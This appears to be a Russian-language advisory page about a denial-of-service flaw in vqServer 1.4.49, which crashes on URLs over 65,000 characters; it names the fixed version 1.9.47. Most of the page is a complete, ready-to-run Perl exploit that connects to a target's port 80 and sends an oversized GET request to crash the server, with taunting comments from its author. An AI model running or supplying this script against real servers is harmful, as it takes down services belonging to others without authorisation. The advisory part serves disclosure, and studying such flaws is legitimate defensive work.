Когда vqServer получает длинный URL (свыше 65000 символов), он уходит в даун. Это может быть использовано с удаленного компьютера для DoS атаки на сервер.

Системы уязвимы:
vqServer 1.4.49

Системы не уязвимы:
vqServer 1.9.47

Фиксим:
Последняя версия vqServer’а (1.9.47) не подвержена ошибке. Скачать можно отсюда.

Эксплоит:

#!/usr/bin/perl

# DoS exploit for vqServer 1.4.49

# This vulnerability was discovered by nemesystm

# (auto45040@hushmail.com)

#

# code by: sinfony (chinesef00d@hotmail.com)

# [confess.sins.labs] (http://www.ro0t.nu/csl)

# and DHC member

#

# kiddie quote of the year:

# dude piffy stfu i bet you don’t even know how to exploit it

die «vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n

usage: $0 \n»

if $#ARGV != 0;

use IO::Socket;

$host = $ARGV[0];

$port = 80;

print «Connecting to $host on port $port…\n»;

$suck = IO::Socket::INET->

new(Proto=>»tcp»,

PeerAddr=>$host,

PeerPort=>$port)

|| die «$host isnt a webserver you schmuck.\n»;

$a = A;

$send = $a x 65000;

print «Connected, sending exploit.\n»;

print $suck «GET /$send\n»;

sleep(3);

print «Exploit sent. vqServer should be dead.\n»;

close($suck)

Скачать с [X]



Оставить мнение